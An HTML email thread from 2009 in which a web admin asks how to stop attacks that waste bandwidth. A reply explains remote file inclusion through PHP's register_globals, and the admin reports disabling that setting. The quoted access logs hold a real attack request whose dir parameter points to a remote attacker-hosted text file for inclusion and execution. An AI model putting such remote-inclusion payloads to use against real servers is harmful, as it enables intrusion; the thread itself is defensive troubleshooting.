Thanks, I turned off register_globals and modified the code and looks like that will take care of this problem.<br><br><div class="gmail_quote">On Mon, Jun 29, 2009 at 9:09 PM, Brandon Checketts <span dir="ltr">&lt;<a href="mailto:brandon@brandonchecketts.com">brandon@brandonchecketts.com</a>&gt;</span> wrote:<br>
<blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex;">The request to webpage.php that returned a 200 status might or might not<br>
be a problem.  You should examine the PHP script and see if it is doing<br>
anything with the $dir variable without verifying that it is safe to use.<br>
<br>
This type of vulnerability is common in old PHP code that relies on<br>
register_globals being enabled.  When register_globals is enabled PHP<br>
will automatically set global variables with those passed in the GET or<br>
POST requests.  Poorly thought out PHP code will sometimes include()<br>
that variable blindly and cause the page to be downloaded and executed.<br>
<br>
<br>
Thanks,<br>
Brandon Checketts<br>
<div class="im"><br>
<br>
<br>
<br>
Ben Alexander wrote:<br>
&gt; Every now and then some IP address from Asia or other place hits our web<br>
&gt; server and is utilizing some PHP or mod_rewrite perhaps bug to proxy<br>
&gt; themselves to another website perhaps and use a lot of bandwidth, but<br>
&gt; only our outgoing it seems.<br>
&gt;<br>
&gt; Here is an example from access_log of this (members.php is not a valid<br>
&gt; PHP page on the site):<br>
&gt;<br>
&gt; 80.93.50.112 - - [27/Jun/2009:01:35:37 -0400] &quot;GET<br>
&gt; //members.php?act=view&amp;p=passwd&amp;dir=<a href="http://lpkpm.com/lib/fatal1.txt??" target="_blank">http://lpkpm.com/lib/fatal1.txt??</a>??<br>
&gt; HTTP/1.1&quot; 404 16942 &quot;-&quot; &quot;Mozilla/5.0&quot; &quot;-&quot;<br>
&gt; 80.93.50.112 - - [27/Jun/2009:01:35:39 -0400] &quot;GET<br>
&gt; /webpage.php//members.php?act=view&amp;p=passwd&amp;dir=<a href="http://lpkpm.com/lib/fatal1.txt??" target="_blank">http://lpkpm.com/lib/fatal1.txt??</a>??<br>
&gt; HTTP/1.1&quot; 200 210484729 &quot;-&quot; &quot;Mozilla/5.0&quot; &quot;-&quot;<br>
&gt;<br>
&gt; When this happens, there are hundreds of megs of log lines like this in<br>
&gt; error_log:<br>
&gt;<br>
&gt; [Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] PHP Warning:<br>
&gt;  virtual() [&lt;a href=&#39;function.virtual&#39;&gt;function.virtual&lt;/a&gt;]: Unable to<br>
&gt; include &#39;footer.php&#39; - error finding URI in<br>
</div>&gt; /htdocs/<a href="http://website.com/webpage.php" target="_blank">website.com/webpage.php</a> &lt;<a href="http://website.com/webpage.php" target="_blank">http://website.com/webpage.php</a>&gt; on line 93<br>
<div class="im">&gt;<br>
&gt; [Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] Request<br>
&gt; exceeded the limit of 10 subrequest nesting levels due to probable<br>
&gt; confguration error. Use &#39;LimitInternalRecursion&#39; to increase the limit<br>
&gt; if necessary. Use &#39;LogLevel debug&#39; to get a backtrace.<br>
&gt;<br>
&gt;<br>
&gt; Any idea how to prevent this?<br></div></blockquote></div>